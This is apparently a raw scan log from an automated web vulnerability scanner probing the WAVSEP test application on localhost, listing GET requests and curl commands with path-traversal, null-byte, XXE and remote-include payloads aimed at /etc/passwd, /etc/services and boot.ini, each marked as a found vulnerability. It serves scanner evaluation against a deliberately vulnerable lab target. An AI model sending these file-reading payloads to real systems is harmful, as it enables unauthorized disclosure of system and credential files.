GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
